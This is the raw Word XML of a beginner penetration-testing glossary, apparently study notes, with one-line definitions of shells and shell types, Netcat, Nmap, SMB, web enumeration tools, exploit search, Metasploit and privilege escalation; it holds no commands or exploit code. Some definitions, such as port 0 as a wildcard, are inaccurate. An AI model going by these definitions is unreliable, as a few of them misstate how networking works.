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E448" w14:textId="025ECE1F" w:rsidR="00CC24A9" w:rsidRDefault="000D6486" w:rsidP="000D6486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  <w:r w:rsidRPr="000D6486">
        <w:rPr>
          <w:rFonts w:ascii="Castellar" w:hAnsi="Castellar"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Getting started Glossary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A163722" w14:textId="114DCBDA" w:rsidR="000D6486" w:rsidRDefault="000D6486" w:rsidP="000D6486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</w:p>
    <w:p w14:paraId="4E2F2A1D" w14:textId="331006B4" w:rsidR="000D6486" w:rsidRPr="000D6486" w:rsidRDefault="000D6486" w:rsidP="007A0351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Setup:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315214EE" w14:textId="2F52FA1D" w:rsidR="000D6486" w:rsidRPr="000D6486" w:rsidRDefault="000D6486" w:rsidP="007A035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F1C76">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Hypervisor</w:t>
      </w:r>
      <w:r w:rsidRPr="000D6486">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>: A Software that allows to create and run virtual machines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F9BF3C" w14:textId="4EF9E3AE" w:rsidR="000D6486" w:rsidRPr="000D6486" w:rsidRDefault="000D6486" w:rsidP="007A035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F1C76">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Ports</w:t>
      </w:r>
      <w:r w:rsidRPr="000D6486">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>: Method of Connection to a service (Range: 1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0D6486">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-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0D6486">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>65535</w:t>
      </w:r>
      <w:r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6C2A334A" w14:textId="77777777" w:rsidR="000D6486" w:rsidRPr="000D6486" w:rsidRDefault="000D6486" w:rsidP="007A035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F1C76">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Port 0</w:t>
      </w:r>
      <w:r w:rsidRPr="000D6486">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>: Is Considered a Wild Card, will connect you to the next open port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FE9D90" w14:textId="77777777" w:rsidR="000D6486" w:rsidRPr="000D6486" w:rsidRDefault="000D6486" w:rsidP="007A035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F1C76">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Shells</w:t>
      </w:r>
      <w:r w:rsidRPr="000D6486">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>: A terminal for interacting with the software (Zsh, Tcsh, Ksh, Fish Shell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EF6492" w14:textId="77777777" w:rsidR="000D6486" w:rsidRPr="000D6486" w:rsidRDefault="000D6486" w:rsidP="007A035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F1C76">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Bash</w:t>
      </w:r>
      <w:r w:rsidRPr="000D6486">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>: Bourne Again Shell (Linux Terminal)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55287B0B" w14:textId="5044346D" w:rsidR="007A0351" w:rsidRPr="007A0351" w:rsidRDefault="000D6486" w:rsidP="007A0351">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numP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F1C76">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Shell Types</w:t>
      </w:r>
      <w:r w:rsidRPr="000D6486">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>: Reverse Shell, Bind Shell, Web Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A285514" w14:textId="77777777" w:rsidR="000D6486" w:rsidRPr="007A0351" w:rsidRDefault="000D6486" w:rsidP="007A035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inorBidi" w:hAnsiTheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A0351">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Basic Tools:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4854A307" w14:textId="77777777" w:rsidR="000D6486" w:rsidRPr="007A0351" w:rsidRDefault="000D6486" w:rsidP="007A0351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F1C76">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>SSH</w:t>
      </w:r>
      <w:r w:rsidRPr="007A0351">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>: Secure Shell on Port 22 (Password Authentication or Public-Key Authentication)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FF174F" w14:textId="77777777" w:rsidR="000D6486" w:rsidRPr="007A0351" w:rsidRDefault="000D6486" w:rsidP="007A0351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F1C76">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Netcat</w:t>
      </w:r>
      <w:r w:rsidRPr="007A0351">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>: Networking utility for reading from and writing to network connections using TCP or UDP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622E34BF" w14:textId="77777777" w:rsidR="000D6486" w:rsidRPr="007A0351" w:rsidRDefault="000D6486" w:rsidP="007A0351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F1C76">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Tmux</w:t>
      </w:r>
      <w:r w:rsidRPr="007A0351">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>: Terminal Multiplexer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AA77C1" w14:textId="77777777" w:rsidR="000D6486" w:rsidRPr="007A0351" w:rsidRDefault="000D6486" w:rsidP="007A0351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F1C76">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Vim</w:t>
      </w:r>
      <w:r w:rsidRPr="007A0351">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>: Screen-based text editor program</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390FFEB5" w14:textId="77777777" w:rsidR="000D6486" w:rsidRPr="007A0351" w:rsidRDefault="000D6486" w:rsidP="007A0351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Theme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A0351">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Service Scanning:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AB4583" w14:textId="77777777" w:rsidR="000D6486" w:rsidRPr="007A0351" w:rsidRDefault="000D6486" w:rsidP="007A0351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F1C76">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Nmap</w:t>
      </w:r>
      <w:r w:rsidRPr="007A0351">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>: Network scanner used to discover hosts and services on a computer network by sending packets &amp; analyzing the responses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069691AD" w14:textId="77777777" w:rsidR="000D6486" w:rsidRPr="007A0351" w:rsidRDefault="000D6486" w:rsidP="007A0351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F1C76">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>FTP</w:t>
      </w:r>
      <w:r w:rsidRPr="007A0351">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>: File Transfere Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595F6094" w14:textId="77777777" w:rsidR="000D6486" w:rsidRPr="007A0351" w:rsidRDefault="000D6486" w:rsidP="007A0351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F1C76">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>SMB</w:t>
      </w:r>
      <w:r w:rsidRPr="007A0351">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>: Server Message Block (Allows Users to share folders &amp; make them accessible)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B08F997" w14:textId="77777777" w:rsidR="000D6486" w:rsidRPr="007A0351" w:rsidRDefault="000D6486" w:rsidP="007A0351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F1C76">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>SMB Client</w:t>
      </w:r>
      <w:r w:rsidRPr="007A0351">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>: Operations include Getting/Putting/Retrieving files Between the local host and the server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793B675A" w14:textId="77777777" w:rsidR="003F1C76" w:rsidRDefault="000D6486" w:rsidP="003F1C7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F1C76">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>SNMP</w:t>
      </w:r>
      <w:r w:rsidRPr="007A0351">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">: Simple Network Management Protocol (Provide Info &amp; Statistics </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="625BD7F1" w14:textId="166D46A2" w:rsidR="000D6486" w:rsidRPr="007A0351" w:rsidRDefault="000D6486" w:rsidP="003F1C76">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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A0351">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>about the Router/Device)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32970A4B" w14:textId="77777777" w:rsidR="000D6486" w:rsidRPr="007A0351" w:rsidRDefault="000D6486" w:rsidP="003F1C76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Theme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A0351">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Web Enumeration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6772A9CC" w14:textId="77777777" w:rsidR="000D6486" w:rsidRPr="003F1C76" w:rsidRDefault="000D6486" w:rsidP="003F1C76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F1C76">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Gobuster/FFUF</w:t>
      </w:r>
      <w:r w:rsidRPr="003F1C76">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>: (File, Directory, DNS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E8ED0C" w14:textId="77777777" w:rsidR="000D6486" w:rsidRPr="003F1C76" w:rsidRDefault="000D6486" w:rsidP="003F1C76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F1C76">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>WhatWeb</w:t>
      </w:r>
      <w:r w:rsidRPr="003F1C76">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>: Extract the version of web servers, supporting frameworks, and applications</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DABB73" w14:textId="77777777" w:rsidR="000D6486" w:rsidRPr="003F1C76" w:rsidRDefault="000D6486" w:rsidP="003F1C76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F1C76">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>SSL/TLS</w:t>
      </w:r>
      <w:r w:rsidRPr="003F1C76">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>: Secure Sockets Layer/Transpoort Layer Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70561FAA" w14:textId="77777777" w:rsidR="000D6486" w:rsidRPr="003F1C76" w:rsidRDefault="000D6486" w:rsidP="003F1C76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F1C76">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>SSL/TLS Certificates</w:t>
      </w:r>
      <w:r w:rsidRPr="003F1C76">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>: Allow web browsers to identify and establish encrypted network connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F42589" w14:textId="26D774E6" w:rsidR="003F1C76" w:rsidRDefault="000D6486" w:rsidP="003F1C76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F1C76">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Robots.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="003F1C76">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">: Instruct search engine web crawlers which resources can be accessed for indexing </w:t>
      </w:r>
      <w:r w:rsidR="003F1C76">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="003F1C76">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>location of private files and admin pages</w:t>
      </w:r>
      <w:r w:rsidR="003F1C76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32AC7459" w14:textId="77777777" w:rsidR="003F1C76" w:rsidRDefault="003F1C7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6281C10A" w14:textId="77777777" w:rsidR="000D6486" w:rsidRPr="003F1C76" w:rsidRDefault="000D6486" w:rsidP="003F1C76">
      <w:p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6C3FC3C9" w14:textId="77777777" w:rsidR="000D6486" w:rsidRPr="003F1C76" w:rsidRDefault="000D6486" w:rsidP="003F1C76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Theme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F1C76">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Public Exploits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6546ECB4" w14:textId="77777777" w:rsidR="000D6486" w:rsidRPr="003F1C76" w:rsidRDefault="000D6486" w:rsidP="003F1C76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F1C76">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>SearchExploit</w:t>
      </w:r>
      <w:r w:rsidRPr="003F1C76">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>: Search for public vulnerabilities/exploits for any application (ExploitDB, Rapid7DB, Vulnerablility Lab)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0709CBD0" w14:textId="77777777" w:rsidR="00CA60B9" w:rsidRDefault="000D6486" w:rsidP="00CA60B9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F1C76">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Metasploit Framework</w:t>
      </w:r>
      <w:r w:rsidRPr="003F1C76">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>: Reconnaissance, Verification , Meterpreter, Post-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF3AACD" w14:textId="4353F5CF" w:rsidR="000D6486" w:rsidRPr="003F1C76" w:rsidRDefault="003F1C76" w:rsidP="00CA60B9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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3F1C76">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>exploitation,</w:t>
      </w:r>
      <w:r w:rsidR="000D6486" w:rsidRPr="003F1C76">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Pivoting tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7148B5D5" w14:textId="2436F241" w:rsidR="00CA60B9" w:rsidRPr="003F1C76" w:rsidRDefault="006858D0" w:rsidP="00CA60B9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Privilege Escalation</w:t>
      </w:r>
      <w:r w:rsidR="00CA60B9" w:rsidRPr="003F1C76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70923303" w14:textId="0E7F219A" w:rsidR="000D6486" w:rsidRPr="006858D0" w:rsidRDefault="006858D0" w:rsidP="00FB3144">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Castellar" w:hAnsi="Castellar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Kernel Exploits</w:t>
      </w:r>
      <w:r w:rsidR="00CA60B9" w:rsidRPr="00CA60B9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>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="006858D0">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ffect a certain version of a kernel or operating system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(Usually Executed Locally on the Machine to gain privilege)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E38D67B" w14:textId="4808B1DF" w:rsidR="006858D0" w:rsidRPr="00A1055B" w:rsidRDefault="00C83AB8" w:rsidP="00FB3144">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Castellar" w:hAnsi="Castellar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Vulnerable Software</w:t>
      </w:r>
      <w:r w:rsidR="00A1055B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="00A1055B" w:rsidRPr="00A1055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80A6D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00580A6D" w:rsidRPr="00580A6D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>efect in software that could allow an attacker to gain control of a system</w:t>
      </w:r>
      <w:r w:rsidR="00580A6D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
